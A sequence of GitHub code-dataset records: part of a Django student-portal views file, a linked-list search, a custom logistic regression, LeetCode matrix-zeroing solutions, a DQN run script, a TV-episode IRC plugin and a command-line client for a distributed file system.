Enrollment.objects.get(course_time = 'evening', user=request.user)\n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n\n\n elif enrollment.course_time == 'night' and hour >17 and hour <21:\n class_time = 'Yes'\n shift_course = Enrollment.objects.get(course_time = 'night', user=request.user)\n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n \n\n\n else:\n shift_course = \"None of your enrolled courses have a class at this time\"\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n \n \n else:\n shift_course = \"You are currently not enrolled in any courses\"\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course':shift_course})\n \n \n\n\n@login_required(login_url='student_login')\ndef exam(request):\n \n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n exam_time = \"no\"\n\n month = now.strftime(\"%m\")\n\n if int(month) == 5 or int(month) == 11:\n exam_time = \"yes\"\n\n \n\n return render(request, \"users/exam.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time,'exam_time': exam_time,})\n\n\n@login_required(login_url='student_login')\ndef voting(request):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n form = VoteForm()\n\n if UserVotes.objects.filter(voter=request.user):\n votes_object = UserVotes.objects.get(voter=request.user)\n\n votes_count = Voting.objects.all()\n\n option1_votes = Voting.objects.get(id=1)\n option1_votes = option1_votes.votes\n\n\n option2_votes = Voting.objects.get(id=2)\n option2_votes = option2_votes.votes\n\n option3_votes = Voting.objects.get(id=3)\n option3_votes = option3_votes.votes\n\n option4_votes = Voting.objects.get(id=4)\n option4_votes = option4_votes.votes\n\n option5_votes = Voting.objects.get(id=5)\n option5_votes = option5_votes.votes\n\n option6_votes = Voting.objects.get(id=6)\n option6_votes = option6_votes.votes\n\n option7_votes = Voting.objects.get(id=7)\n option7_votes = option7_votes.votes\n\n total_votes = option1_votes + option2_votes + option3_votes + option4_votes + option5_votes + option6_votes + option7_votes\n\n\n return render(request, \"users/voting.html\", {'user_profile': user_profile, 'today':today, \n 'current_time': current_time,'votes_object': votes_object, 'votes_count':votes_count, 'total_votes':total_votes\n })\n \n\n else:\n if request.method == 'POST':\n form = VoteForm(request.POST)\n if form.is_valid():\n vote = form.cleaned_data['vote']\n vote_instance = 
Voting.objects.get(option=vote)\n \n votes_object = UserVotes.objects.create(voter=request.user, chosen_option = vote_instance, has_voted = True)\n\n chosen_option = Voting.objects.get(option=vote)\n chosen_option.votes = chosen_option.votes+1\n chosen_option.save()\n\n messages.info(request, f\"voted {vote}\")\n \n\n\n return redirect('voting')\n return render(request, \"users/voting.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'form':form })\n\n\n@login_required(login_url='student_login')\ndef enrollment(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n student_courses = Enrollment.objects.filter(user = request.user) \n\n\n return render(request, \"users/enrollment.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'student_courses':student_courses})\n\n@login_required(login_url='student_login')\ndef add_course(request):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n fees_object = Fees.objects.get(user=request.user)\n available_courses = AvailableCourses.objects.filter(course_for= user_profile.degree_title) | AvailableCourses.objects.filter(course_for = 'all') \n shift =[]\n i = 0\n\n if Enrollment.objects.filter(user=request.user):\n enrollment_object = Enrollment.objects.filter(user=request.user)\n\n for courses in enrollment_object:\n \n shift.append(courses.course_time)\n available_courses = available_courses.exclude(course_time=shift[i])\n i= i+1\n \n \n if request.method == 'POST':\n\n if not request.POST:\n return redirect('add_course')\n course = request.POST['course']\n \n course = AvailableCourses.objects.get(course_name=course)\n\n add_course = Enrollment.objects.create(user=request.user, course_name=course.course_name, course_for=course.course_for, course_time=course.course_time)\n add_course.save()\n\n fees_object.course_fees = fees_object.course_fees + 10000\n fees_object.balance = fees_object.balance + 10000\n fees_object.save()\n\n messages.info(request, f\"{course} course added \")\n\n return redirect('enrollment')\n \n return render(request, \"users/add_course.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'available_courses':available_courses})\n\n\n\n\n\n\n ","repo_name":"Faiz-Rasul/first_project","sub_path":"step/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"46446915981","text":"'''\nQUESTION -\n----------\nSearch for a specific value in a linked list. Return True if present and False if not present.\nSample Input: 10 --> 20 --> 30 --> 50 --> 40 and search node with value = 20\nOutput: True\n\nAPPROACH -\n----------\n 1. Start from the head node and traverse through the list.\n 2. 
Traverse till we find the node with the desired value.\n - If the desired value is found, then return True.\n - If the desired value is not found after traversing the entire list, then return False.\n\n TIME COMPLEXITY - O(N) as we traversed through the LL\n SPACE COMPLEXITY - O(1)\n'''\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nclass Solution:\n def searchLinkedList(self, head, N):\n current = head\n\n while current:\n if current.value == N:\n return True\n current = current.next\n\n return False\n\n\nif __name__ == '__main__':\n node1 = Node(0)\n node2 = Node(-12)\n node3 = Node(72)\n node4 = Node(100)\n node5 = Node(72)\n\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n\n s = Solution()\n print(s.searchLinkedList(node1, -11)) #This will return False\n print(s.searchLinkedList(node1, -12)) #This will return True\n","repo_name":"setu-parekh/DS-Algo-Coding-Challenges","sub_path":"Linked_List/Educative/search_in_singly_linked_list.py","file_name":"search_in_singly_linked_list.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38516034712","text":"import numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\n\n\nclass CustomLogisticRegression:\n\n def __init__(self, fit_intercept=True, l_rate=0.01, n_epoch=100):\n self.fit_intercept = fit_intercept\n self.l_rate = l_rate\n self.n_epoch = n_epoch\n self.first_mse = []\n self.last_mse = []\n self.first_log_loss = []\n self.last_log_loss = []\n\n def sigmoid(self, t):\n return 1 / (1 + np.exp(-t))\n\n def predict_proba(self, row, coef_):\n if self.fit_intercept:\n row = np.insert(row, 0, np.ones(row.shape[0]), axis=1)\n t = row.dot(coef_)\n return self.sigmoid(t)\n\n def mse(self, X, y):\n yhat = self.predict_proba(X, self.coef_)\n return ((yhat - y) ** 2).mean()\n\n def update_coef_mse(self, row, yval):\n yhat = self.predict_proba(row, self.coef_)\n dJdt = (yhat - yval) * yhat * (1 - yhat)\n self.coef_ += -self.l_rate * dJdt * row\n\n\n def fit_mse(self, X_train, y_train):\n n = X_train.shape[0]\n if self.fit_intercept:\n X_train = np.insert(X_train, 0, np.ones(n), axis=1)\n self.coef_ = np.zeros(X_train.shape[1])\n self.fit_intercept = False\n\n for i in range(n):\n self.update_coef_mse(X_train[i], y_train[i])\n self.first_mse.append(self.mse(X_train, y_train))\n\n for epoch in range(self.n_epoch - 2):\n for i in range(n):\n self.update_coef_mse(X_train[i], y_train[i])\n\n for i in range(n):\n self.update_coef_mse(X_train[i], y_train[i])\n self.last_mse.append(self.mse(X_train, y_train))\n\n self.fit_intercept = True\n\n def log_loss(self, X, y):\n yhat = self.predict_proba(X, self.coef_)\n return -(y * np.log(yhat) + (1 - y) * np.log(1 - yhat)).mean()\n\n def update_coef_log(self, row, yval, n):\n yhat = self.predict_proba(row, self.coef_)\n y_error = (yhat - yval)\n self.coef_ += -self.l_rate * y_error * row / n\n\n def fit_log_loss(self, X_train, y_train):\n n = X_train.shape[0]\n if self.fit_intercept:\n X_train = np.insert(X_train, 0, np.ones(n), axis=1)\n self.coef_ = np.zeros(X_train.shape[1])\n self.fit_intercept = False\n\n for i in range(n):\n self.update_coef_log(X_train[i], y_train[i], n)\n self.first_log_loss.append(self.log_loss(X_train, y_train))\n\n for epoch in range(self.n_epoch - 2):\n for i in 
range(n):\n                self.update_coef_log(X_train[i], y_train[i], n)\n\n        for i in range(n):\n            self.update_coef_log(X_train[i], y_train[i], n)\n        self.last_log_loss.append(self.log_loss(X_train, y_train))\n\n        self.fit_intercept = True\n\n    def predict(self, X_test, cut_off=0.5):\n        yhat = self.predict_proba(X_test, self.coef_)\n        return (yhat >= cut_off).astype(int)\n\n\ndef load_data():\n    data = datasets.load_breast_cancer()\n    col_names = ['worst concave points', 'worst perimeter', 'worst radius']\n    col_inds = [np.where(data.feature_names == name)[0][0] for name in col_names]\n    X = data.data[:,col_inds]\n    y = data.target\n    return (X, y)\n\n\ndef standardise_data(X):\n    mean_vals = X.mean(axis=0)\n    std_vals = X.std(axis=0)\n    return (X - mean_vals) / std_vals\n\n\ndef split_data(X, y):\n    return train_test_split(X, y, train_size=0.8, random_state=43)\n\n\nX, y = load_data()\nX = standardise_data(X)\nX_train, X_test, y_train, y_test = split_data(X, y)\n\nmodel = CustomLogisticRegression(fit_intercept=True, l_rate=0.01, n_epoch=1000)\n\nmodel.fit_mse(X_train, y_train)\ny_pred_mse = model.predict(X_test)\n\nmodel.fit_log_loss(X_train, y_train)\ny_pred_log = model.predict(X_test)\n\nskmodel = LogisticRegression()\nskmodel.fit(X_train, y_train)\ny_pred_sk = skmodel.predict(X_test)  # predict with the fitted sklearn model, not the custom one\n\nprint({'mse_accuracy': accuracy_score(y_pred_mse, y_test),\n       'logloss_accuracy': accuracy_score(y_pred_log, y_test),\n       'sklearn_accuracy': accuracy_score(y_pred_sk, y_test),\n       'mse_error_first': model.first_mse,\n       'mse_error_last': model.last_mse,\n       'logloss_error_first': model.first_log_loss,\n       'logloss_error_last': model.last_log_loss})\n\nprint(\"\"\"Answers to the questions:\n1) 0.0001\n2) 0.0000\n3) 0.00152\n4) 0.0055\n5) expanded\n6) expanded\n\"\"\"\n)\n# res = {'coef_': list(model.coef_), 'accuracy': acc}\n# print(res)\n","repo_name":"alcala21/logistic-regression","sub_path":"logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15610781551","text":"\"\"\"\n\n73. 
Set Matrix Zeroes\nMedium\n\nGiven an m x n integer matrix matrix, if an element is 0, set its entire row and column to 0's.\n\nYou must do it in place.\n\n\nExample 1:\n\n\nInput: matrix = [[1,1,1],[1,0,1],[1,1,1]]\nOutput: [[1,0,1],[0,0,0],[1,0,1]]\nExample 2:\n\n\nInput: matrix = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]\nOutput: [[0,0,0,0],[0,4,5,0],[0,3,1,0]]\n\n\nConstraints:\n\nm == matrix.length\nn == matrix[0].length\n1 <= m, n <= 200\n-2^31 <= matrix[i][j] <= 2^31 - 1\n\n\nFollow up:\n\nA straightforward solution using O(mn) space is probably a bad idea.\nA simple improvement uses O(m + n) space, but still not the best solution.\nCould you devise a constant space solution?\n\n\"\"\"\n\n# V0\n# IDEA : array op\nclass Solution(object):\n    def setZeroes(self, matrix):\n        # edge case\n        if not matrix:\n            return\n        l = len(matrix)\n        w = len(matrix[0])\n        # get zeros\n        x_zeros = set()\n        y_zeros = set()\n        for i in range(l):\n            for j in range(w):\n                if matrix[i][j] == 0:\n                    x_zeros.add(j)\n                    y_zeros.add(i)\n\n        # row -> 0\n        for i in y_zeros:\n            matrix[i] = [0] * w\n        # col -> 0\n        for i in x_zeros:\n            for j in range(l):\n                matrix[j][i] = 0\n\n        #print (\"matrix = \" + str(matrix))\n\n# V0'\n# IDEA : array op\nclass Solution(object):\n    def setZeroes(self, matrix):\n\n        if not matrix:\n            return matrix\n\n        def help(matrix, xy):\n            ### NOTE :\n            # -> for cases matrix[i][j]:\n            # -> y is FIRST element (i)\n            # -> x is SECOND element (j)\n            x = xy[1]\n            y = xy[0]\n            matrix[y] = [0] * len(matrix[0])\n            for j in range(len(matrix)):\n                matrix[j][x] = 0\n            return matrix\n\n        _list = []\n        for i in range(len(matrix)):\n            for j in range(len(matrix[0])):\n                if matrix[i][j] == 0:\n                    _list.append([i,j])\n\n        for xy in _list:\n            matrix = help(matrix, xy)\n        return matrix\n\n# V0''\n# IDEA : array op\nclass Solution:\n    def setZeroes(self, matrix):\n        rownum = len(matrix)\n        colnum = len(matrix[0])\n        row = [False for i in range(rownum)]\n        col = [False for i in range(colnum)]\n        for i in range(rownum):\n            for j in range(colnum):\n                if matrix[i][j] == 0:\n                    row[i] = True\n                    col[j] = True\n        for i in range(rownum):\n            for j in range(colnum):\n                if row[i] == True or col[j] == True:\n                    matrix[i][j] = 0\n\n# V1\n# https://www.cnblogs.com/zuoyuan/p/3769698.html\n# TIME COMPLEXITY : O(N*M)\n# SPACE COMPLEXITY : O(N+M)\n# IDEA : RECORD X, Y (X, Y AXIS) TO CHECK IF THERE IS 0 EXISTING\n# THEN GO THROUGH ARRAY TO CHECK RELATIVE ROWS AND COLUMNS\n# AND UPDATE THE VALUES (value -> 0)\nclass Solution:\n    # @param matrix, a list of lists of integers\n    # RETURN NOTHING, MODIFY matrix IN PLACE.\n    def setZeroes(self, matrix):\n        rownum = len(matrix)\n        colnum = len(matrix[0])\n        row = [False for i in range(rownum)]\n        col = [False for i in range(colnum)]\n        for i in range(rownum):\n            for j in range(colnum):\n                if matrix[i][j] == 0:\n                    row[i] = True\n                    col[j] = True\n        for i in range(rownum):\n            for j in range(colnum):\n                if row[i] or col[j]:\n                    matrix[i][j] = 0\n        # return the matrix so the test cases below can compare results\n        return matrix\n\n### Test case\ns=Solution()\nassert s.setZeroes([[]]) == [[]]\nassert s.setZeroes([[0]]) == [[0]]\nassert s.setZeroes([[1]]) == [[1]]\nassert s.setZeroes([[1,2,3]]) == [[1,2,3]]\nassert s.setZeroes([[0,2,3]]) == [[0,0,0]]\nassert s.setZeroes([[1,2,3],[4,5,6]]) == [[1,2,3],[4,5,6]]\nassert s.setZeroes([[1,2,3], [4,5,6], [7,8,9]]) == [[1,2,3], [4,5,6], [7,8,9]]\nassert s.setZeroes([[1,2,3], [4,0,6], [7,8,9]]) == [[1,0,3], [0,0,0], [7,0,9]]\nassert s.setZeroes([[1,2,3,999], [4,0,6,0], [0,7,8,9]]) == [[0, 0, 3, 0], [0, 0, 0, 0], [0, 0, 0, 0]]\nassert s.setZeroes([[0,0,0], [0,0,0], [0,0,0]]) == 
[[0,0,0], [0,0,0], [0,0,0]]\n\n# V1''\n# https://leetcode.com/problems/set-matrix-zeroes/solution/\n# IDEA : BRUTE FORCE + DOUBLE LOOP\n# TIME COMPLEXITY : O(N*M)\n# SPACE COMPLEXITY : O(N+M)\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n R = len(matrix)\n C = len(matrix[0])\n rows, cols = set(), set()\n\n # Essentially, we mark the rows and columns that are to be made zero\n for i in range(R):\n for j in range(C):\n if matrix[i][j] == 0:\n rows.add(i)\n cols.add(j)\n\n # Iterate over the array once again and using the rows and cols sets, update the elements\n for i in range(R):\n for j in range(C):\n if i in rows or j in cols:\n matrix[i][j] = 0\n \n# V1'''\n# https://leetcode.com/problems/set-matrix-zeroes/solution/\n# TIME COMPLEXITY : O((N*M))\n# SPACE COMPLEXITY : O(1)\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n is_col = False\n R = len(matrix)\n C = len(matrix[0])\n for i in range(R):\n # Since first cell for both first row and first column is the same i.e. matrix[0][0]\n # We can use an additional variable for either the first row/column.\n # For this solution we are using an additional variable for the first column\n # and using matrix[0][0] for the first row.\n if matrix[i][0] == 0:\n is_col = True\n for j in range(1, C):\n # If an element is zero, we set the first element of the corresponding row and column to 0\n if matrix[i][j] == 0:\n matrix[0][j] = 0\n matrix[i][0] = 0\n\n # Iterate over the array once again and using the first row and first column, update the elements.\n for i in range(1, R):\n for j in range(1, C):\n if not matrix[i][0] or not matrix[0][j]:\n matrix[i][j] = 0\n\n # See if the first row needs to be set to zero as well\n if matrix[0][0] == 0:\n for j in range(C):\n matrix[0][j] = 0\n\n # See if the first column needs to be set to zero as well \n if is_col:\n for i in range(R):\n matrix[i][0] = 0\n \n# V1'''\n# https://leetcode.com/problems/set-matrix-zeroes/solution/\n# TIME COMPLEXITY : O((N*M)*(N+M))\n# SPACE COMPLEXITY : O(1)\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n MODIFIED = -1000000\n R = len(matrix)\n C = len(matrix[0])\n for r in range(R):\n for c in range(C):\n if matrix[r][c] == 0:\n # We modify the elements in place. 
Note, we only change the non zeros to MODIFIED\n for k in range(C):\n matrix[r][k] = MODIFIED if matrix[r][k] != 0 else 0\n for k in range(R):\n matrix[k][c] = MODIFIED if matrix[k][c] != 0 else 0\n for r in range(R):\n for c in range(C):\n # Make a second pass and change all MODIFIED elements to 0 \"\"\"\n if matrix[r][c] == MODIFIED:\n matrix[r][c] = 0\n\n# V1''''\n# https://blog.csdn.net/qqxx6661/article/details/78279728\nclass Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n m , n = len(matrix), len(matrix[0])\n row , col = [0 for i in range(m)] , [0 for i in range(n)]\n for i in range(m):\n for j in range(n):\n if not matrix[i][j]:\n row[i]=col[j]=1\n for i in range(m):\n if row[i]:\n for j in range(n):\n matrix[i][j]=0\n\n for j in range(n):\n if col[j]:\n for i in range(m):\n matrix[i][j]=0\n\n# V1'''''''\n# https://blog.csdn.net/qqxx6661/article/details/78279728\nclass Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n m , n = len(matrix), len(matrix[0])\n temp = [[matrix[i][j] for j in range(n)] for i in range(m)]\n for i in range(m):\n for j in range(n):\n if not temp[i][j]:\n self.setZero(i,j,n,m,matrix)\n\n def setZero(self,row,col,n,m,matrix):\n for i in range(m):\n matrix[i][col]=0\n for j in range(n):\n matrix[row][j]=0\n \n# V2 \nfrom functools import reduce\n# Time: O(m * n)\n# Space: O(1)\nclass Solution(object):\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n first_col = reduce(lambda acc, i: acc or matrix[i][0] == 0, range(len(matrix)), False)\n first_row = reduce(lambda acc, j: acc or matrix[0][j] == 0, range(len(matrix[0])), False)\n\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if matrix[i][j] == 0:\n matrix[i][0], matrix[0][j] = 0, 0\n\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n if first_col:\n for i in range(len(matrix)):\n matrix[i][0] = 0\n\n if first_row:\n for j in range(len(matrix[0])):\n matrix[0][j] = 0","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Array/set-matrix-zeroes.py","file_name":"set-matrix-zeroes.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"35470319872","text":"import run\n\nd = run.d\nd['dqn.no_replay'] = True\nd['visualize'] = 'q'\nd['dqn.replay_start_size'] = 100\nd['dqn.log_frequency'] = 10\nd['dqn.final_epsilon'] = 0.1\nd['dqn.initial_epsilon'] = 0.1\nd['weights_dir'] = 'weights'\nd['show_mood'] = run.Plot\nrun.main(**d)\n","repo_name":"yenchenlin/deep-q-learning","sub_path":"run_play.py","file_name":"run_play.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"5085728783","text":"# -*- coding: utf-8 -*-\n\nfrom commands import Command\nimport re\nimport utility\n\nclass NextEpisodeCommand(Command):\n\tapi_url = \"http://services.tvrage.com/tools/quickinfo.php?show=%s\"\n\tsearch_url = \"http://tvrage.com/search.php?search=%s\"\n\tpattern = re.compile(r\"(.+?)@(.+)\")\n\tusage = \"Usage: .nextep Name of TV Show\"\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef fetch_tv_info(self, show):\n\t\tinfo = {}\n\t\tdata = utility.read_url(self.api_url % show)[\"data\"]\n\t\tfor 
m in self.pattern.finditer(data):\n\t\t\tinfo[m.group(1)] = m.group(2)\n\t\treturn info\n\n\tdef trig_nextep(self, bot, source, target, trigger, argument):\n\t\t\"\"\"Information about the latest and next episode of a TV show.\"\"\"\n\n\t\t# Sanitize argument\n\t\targument = utility.escape(argument.strip())\n\n\t\tif not argument:\n\t\t\treturn self.usage\n\n\t\t# Fetch data\n\t\tinfo = self.fetch_tv_info(argument)\n\t\tif \"Show Name\" not in info:\n\t\t\treturn \"TV show not found | Manual search: \" + (self.search_url % argument)\n\t\t\n\t\t# Name of TV series\n\t\tname = info[\"Show Name\"]\n\n\t\t# Premiere year\n\t\tif \"Premiered\" in info:\n\t\t\tname += \" (\" + info[\"Premiered\"] + \")\"\n\t\t\n\t\t# Latest episode\n\t\tif \"Latest Episode\" in info:\n\t\t\tlast_ep = info[\"Latest Episode\"].replace(\"^\", \", \")\n\t\telse:\n\t\t\tlast_ep = \"Unknown\"\n\n\t\t# Next episode\n\t\tif \"Next Episode\" in info:\n\t\t\tnext_ep = info[\"Next Episode\"].replace(\"^\", \", \")\n\t\telse:\n\t\t\tnext_ep = \"Unknown\"\n\t\t\tif \"Status\" in info:\n\t\t\t\tnext_ep += \" - \" + info[\"Status\"].replace(\"^\", \", \")\n\t\t\n\t\t# Info URL\n\t\tif \"Show URL\" in info:\n\t\t\turl = info[\"Show URL\"]\n\t\telse:\n\t\t\turl = self.search_url % argument\n\t\t\n\t\t# Compose result\n\t\treturn \"%s | Latest: %s | Next: %s | Read more: %s\" % (name, last_ep, next_ep, url)\n\t\t\t\n","repo_name":"dhtech/pyirkbot","sub_path":"plugins/nextep.py","file_name":"nextep.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37175083227","text":"import configparser\nimport os\nimport re\n\nimport requests\nfrom requests import Response\n\nconfig = configparser.ConfigParser()\nconfig.read('client.ini')\nHOST = config[\"DEFAULT\"][\"host\"]\nPORT = config[\"DEFAULT\"][\"port\"]\n\ncurrent_directory = ''\n\n\ndef info_query(query):\n return f'http://{HOST}:{PORT}/files/info/{query}'\n\n\ndef file_query(query):\n return f'http://{HOST}:{PORT}/files/{query}'\n\n\ndef common_query(query):\n return f'http://{HOST}:{PORT}/{query}'\n\n\ndef make_request(request_function, args):\n result: Response = request_function(args)\n if result.status_code == 404 or '404 Not Found' in result.text:\n return 'No result found'\n elif result.status_code == 500:\n return 'Some error occurred'\n else:\n return result.text\n\n\ndef get_path(some_path: str):\n if some_path.startswith('./'):\n if current_directory == '':\n slash = ''\n else:\n slash = '/'\n return f'{current_directory.lstrip(\"/\")}{slash}{some_path.lstrip(\"./\")}'\n else:\n return some_path.lstrip(\"/\")\n\n\n# Commands section\n# -----------------------------------\n\ndef initialize() -> requests.Response:\n return requests.get(common_query('initialize'))\n\n\ndef create_file(file_name: str, path_to_file: str):\n final_path = get_path(path_to_file.strip() + '/' + file_name.strip())\n requests.post(file_query(final_path), data=b'')\n\n\ndef write_file(file_from: str, file_to: str):\n data = open(file_from, 'rb').read()\n requests.post(file_query(get_path(file_to)), data=data)\n\n\ndef read_file(file_from: str, file_to: str):\n get = requests.get(file_query(get_path(file_from)))\n if get.status_code == 404:\n return 'No result found'\n elif get.status_code == 500:\n return 'Some error occurred'\n else:\n if '/' in file_to:\n path_to_folder = file_to[: file_to.rfind('/')]\n if not os.path.exists(path_to_folder):\n os.makedirs(path_to_folder)\n open(file_to, 
'wb').write(get.content)\n\n\ndef delete_file(path_to_file):\n if current_directory != '':\n requests.delete(file_query(f'{current_directory}/{os.path.basename(path_to_file)}'))\n else:\n requests.delete(file_query(os.path.basename(path_to_file)))\n\n\ndef info_file(path_to_file: str):\n path_to_file = get_path(path_to_file.strip())\n return make_request(requests.get, info_query(path_to_file))\n\n\ndef copy_file(file_from: str, file_to: str):\n file_from = get_path(file_from.strip())\n file_to = get_path(file_to.strip())\n\n request = make_request(requests.get, info_query(file_from))\n if (request == 'No result found') or (request == 'Some error occurred'):\n return request\n else:\n file = requests.get(file_query(file_from)).content\n requests.post(file_query(file_to), data=file)\n return 'OK'\n\n\ndef move_file(file_from: str, file_to: str):\n file_from = get_path(file_from.strip())\n file_to = get_path(file_to.strip())\n\n request = make_request(requests.get, info_query(file_from))\n if (request == 'No result found') or (request == 'Some error occurred'):\n return request\n else:\n file = requests.get(file_query(file_from)).content\n requests.delete(file_query(file_from))\n requests.post(file_query(file_to), data=file)\n return 'OK'\n\n\ndef open_directory(path_to_directory):\n global current_directory\n if path_to_directory == '..':\n if '/' in current_directory:\n path_to_directory = current_directory[:current_directory.rfind('/')]\n else:\n current_directory = ''\n return 'OK'\n\n request = make_request(requests.get, info_query(path_to_directory))\n if (request == 'No result found') or (request == 'Some error occurred'):\n return request\n current_directory = path_to_directory\n return 'OK'\n\n\ndef read_directory():\n if current_directory == '':\n return make_request(requests.get, info_query('./'))\n return make_request(requests.get, info_query(get_path(current_directory)))\n\n\ndef make_directory(path_to_directory: str):\n return requests.post(file_query(path_to_directory + f'?dir=1')).text\n\n\ndef delete_directory(path_to_directory: str):\n return requests.delete(file_query(path_to_directory + f'?dir=1')).text\n\n\n# -----------------------------------\n# End of commands section\n\ncommands = '''\nfile_name > path/name - creates empty file\nstat file_name - prints file info\ncp from to - copies file\nmv from to - moves file\ncd path - open path\nmkdir path - makes directory\nrmdir path - removes directory\nwrite path_on_computer path_on_server - upload to server\nread path_on_server path_on_computer - reads to pc\nrm path - deletes file on server\n'''\n\nif __name__ == '__main__':\n print('Client for DFS started!')\n try:\n print(initialize().text)\n except requests.ConnectionError:\n print(f'DFS is not running on host `{HOST}:{PORT}`. Please, check your configuration.')\n print('Exiting...')\n exit(0)\n\n print('DFS is running and ready to use, good luck :)')\n print()\n print('Please, type in the command. 
Type `help` for the list of available commands')\n\n while True:\n command = input()\n\n if command == 'help':\n print(commands)\n elif re.compile(r'(.+)>(.+)').search(command) is not None:\n name, path = re.compile(r'(.+)>(.+)').search(command).groups()\n create_file(name, path)\n elif re.compile(r'stat (.+)').search(command) is not None:\n path = re.compile(r'stat (.+)').search(command).group(1)\n print(info_file(path))\n elif re.compile(r'cp (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'cp (.+) (.+)').search(command).groups()\n print(copy_file(what, where))\n elif re.compile(r'mv (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'mv (.+) (.+)').search(command).groups()\n print(move_file(what, where))\n elif re.compile(r'cd (.+)').search(command) is not None:\n directory = re.compile(r'cd (.+)').search(command).group(1)\n print(open_directory(directory))\n print(f'Current directory: {current_directory}')\n elif re.compile(r'mkdir (.+)').search(command) is not None:\n directory = re.compile(r'mkdir (.+)').search(command).group(1)\n print(make_directory(directory))\n elif re.compile(r'rmdir (.+)').search(command) is not None:\n directory = re.compile(r'rmdir (.+)').search(command).group(1)\n print(delete_directory(directory))\n elif re.compile(r'write (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'write (.+) (.+)').search(command).groups()\n print(write_file(what, where))\n elif re.compile(r'read (.+) (.+)').search(command) is not None:\n what, where = re.compile(r'read (.+) (.+)').search(command).groups()\n print(read_file(what, where))\n elif re.compile(r'rm (.+)').search(command) is not None:\n what = re.compile(r'rm (.+)').search(command).group(1)\n print(delete_file(what))\n elif command == 'ls':\n print(read_directory())\n else:\n print(f'There is no command `{command}`! 
